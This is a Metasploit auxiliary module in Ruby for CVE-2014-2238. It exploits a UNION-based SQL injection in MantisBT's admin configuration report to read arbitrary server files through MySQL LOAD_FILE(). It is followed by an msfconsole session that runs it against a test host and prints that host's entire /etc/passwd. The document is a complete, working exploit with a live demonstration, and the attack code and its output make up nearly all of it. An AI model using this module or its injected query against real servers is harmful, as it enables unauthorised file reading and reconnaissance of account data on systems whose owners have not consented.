CVE-2014-2238
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# Metasploit Framework core: provides Msf::Auxiliary, the HttpClient mixin,
# the datastore/option classes and the print_* helpers used below.
require 'msf/core'
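class Metasploit3 < Msf::Auxiliary
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  # The injected query wraps the hex-encoded LOAD_FILE() result in the
  # literal markers "qgjuq" (0x71676a7571) and "qirpq" (0x7169727071) so the
  # payload can be located in the HTML response. The capture is non-greedy so
  # a second marker pair on the page cannot swallow more than one result.
  RESULT_RE = /qgjuq(.*?)qirpq/

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MantisBT Admin SQL Injection Arbitrary File Read",
      'Description'    => %q{
        This module logs in to a MantisBT installation with the supplied
        credentials and then issues a UNION-based SQL injection through the
        filter_config_id parameter of adm_config_report.php. The injected
        query calls LOAD_FILE() on the path given in FILE and the hex-encoded
        contents are extracted from the response and printed. Valid
        credentials that can reach the admin configuration report are
        required.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
        ],
      'References'     =>
        [
          ['CVE', '2014-2238']
        ],
      'Platform'       => ['win', 'linux'],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 28 2014"))

    register_options(
      [
        OptString.new('FILE', [ true, 'Path to remote file', '/etc/passwd']),
        OptString.new('USERNAME', [ true, 'Single username', 'administrator']),
        OptString.new('PASSWORD', [ true, 'Single password', 'password']),
        OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/'])
      ], self.class)
  end

  # Authenticates, sends the injected report filter and prints the file.
  #
  # Both HTTP round trips are checked for a nil response (connection failure
  # or timeout) before their bodies are touched, and the captured payload is
  # validated as hex before decoding: IFNULL(..., 0x20) in the query yields a
  # single space when LOAD_FILE() returns NULL, which would otherwise be
  # packed into garbage and printed as if it were file content.
  def run
    post = {
      'return'         => 'index.php',
      'username'       => datastore['USERNAME'],
      'password'       => datastore['PASSWORD'],
      'secure_session' => 'on'
    }

    # Log in first; the session cookie is needed for adm_config_report.php.
    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, '/login.php'),
      'method'    => 'POST',
      'vars_post' => post
    })

    if res.nil?
      print_error("No response from login.php; is the target reachable?")
      return
    end

    cookie = res.get_cookies

    # LOAD_FILE() is given the path as a MySQL hex literal (0x...), so the
    # FILE option is hex-encoded before being spliced into the query.
    filepath = datastore['FILE'].unpack("H*")[0]

    # Detection note: the UNION SELECT carried in the filter_config_id field
    # of this POST body is a distinctive signature for request inspection.
    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, '/adm_config_report.php'),
      'method' => 'POST',
      'data'   => "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-7856%27+UNION+ALL+SELECT+11%2C11%2C11%2C11%2CCONCAT%280x71676a7571%2CIFNULL%28CAST%28HEX%28LOAD_FILE%280x#{filepath}%29%29+AS+CHAR%29%2C0x20%29%2C0x7169727071%29%2C11%23&apply_filter_button=Apply+Filter",
      'cookie' => cookie
    })

    if res.nil?
      print_error("No response from adm_config_report.php")
      return
    end

    match = res.body.to_s.match(RESULT_RE)
    if match.nil?
      print_error("Result markers not found in the response; the target may not be vulnerable or the login failed")
      return
    end

    hex = match[1]
    unless hex =~ /\A[0-9a-fA-F]+\z/
      print_error("LOAD_FILE() returned NULL or unexpected data; the file may not exist or be readable by the database user")
      return
    end

    file = [hex].pack("H*")
    print_good(file)
  end
end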
__END__ | |
bperry@ubuntu:~/tools/metasploit-framework$ ./msfconsole | |
Call trans opt: received. 2-19-98 13:24:18 REC:Loc | |
Trace program: running | |
wake up, Neo... | |
the matrix has you | |
follow the white rabbit. | |
knock, knock, Neo. | |
(`. ,-, | |
` `. ,;' / | |
`. ,'/ .' | |
`. X /.' | |
.-;--''--.._` ` ( | |
.' / ` | |
, ` ' Q ' | |
, , `._ \ | |
,.| ' `-.;_' | |
: . ` ; ` ` --,.._; | |
' ` , ) .' | |
`._ , ' /_ | |
; ,''-,;' ``- | |
``-..__``--` | |
http://metasploit.pro | |
=[ metasploit v4.8.0-dev [core:4.8 api:1.0] | |
+ -- --=[ 1178 exploits - 649 auxiliary - 186 post | |
+ -- --=[ 312 payloads - 30 encoders - 8 nops | |
msf > use auxiliary/gather/mantisbt_admin_sqli | |
msf auxiliary(mantisbt_admin_sqli) > set RHOST 172.31.16.109 | |
RHOST => 172.31.16.109 | |
msf auxiliary(mantisbt_admin_sqli) > set TARGETURI /mantisbt-1.2.16/ | |
TARGETURI => /mantisbt-1.2.16/ | |
msf auxiliary(mantisbt_admin_sqli) > set PASSWORD password | |
PASSWORD => password | |
msf auxiliary(mantisbt_admin_sqli) > show options | |
Module options (auxiliary/gather/mantisbt_admin_sqli): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
FILE /etc/passwd yes Path to remote file | |
PASSWORD password yes Single password | |
Proxies no Use a proxy chain | |
RHOST 172.31.16.109 yes The target address | |
RPORT 80 yes The target port | |
TARGETURI /mantisbt-1.2.16/ yes Relative URI of MantisBT installation | |
USERNAME administrator yes Single username | |
VHOST no HTTP server virtual host | |
msf auxiliary(mantisbt_admin_sqli) > run | |
[+] root:x:0:0:root:/root:/bin/bash | |
daemon:x:1:1:daemon:/usr/sbin:/bin/sh | |
bin:x:2:2:bin:/bin:/bin/sh | |
sys:x:3:3:sys:/dev:/bin/sh | |
sync:x:4:65534:sync:/bin:/bin/sync | |
games:x:5:60:games:/usr/games:/bin/sh | |
man:x:6:12:man:/var/cache/man:/bin/sh | |
lp:x:7:7:lp:/var/spool/lpd:/bin/sh | |
mail:x:8:8:mail:/var/mail:/bin/sh | |
news:x:9:9:news:/var/spool/news:/bin/sh | |
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh | |
proxy:x:13:13:proxy:/bin:/bin/sh | |
www-data:x:33:33:www-data:/var/www:/bin/sh | |
backup:x:34:34:backup:/var/backups:/bin/sh | |
list:x:38:38:Mailing List Manager:/var/list:/bin/sh | |
irc:x:39:39:ircd:/var/run/ircd:/bin/sh | |
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh | |
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh | |
libuuid:x:100:101::/var/lib/libuuid:/bin/sh | |
syslog:x:101:103::/home/syslog:/bin/false | |
messagebus:x:102:104::/var/run/dbus:/bin/false | |
bperry:x:1000:1000:Brandon Perry,,,:/home/bperry:/bin/bash | |
avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false | |
usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false | |
dnsmasq:x:105:65534:dnsmasq,,,:/var/lib/misc:/bin/false | |
whoopsie:x:106:114::/nonexistent:/bin/false | |
avahi:x:107:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false | |
colord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/false | |
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false | |
pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false | |
rtkit:x:111:121:RealtimeKit,,,:/proc:/bin/false | |
saned:x:112:122::/home/saned:/bin/false | |
speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh | |
lightdm:x:114:123:Light Display Manager:/var/lib/lightdm:/bin/false | |
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false | |
mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false | |
[*] Auxiliary module execution completed | |
msf auxiliary(mantisbt_admin_sqli) > |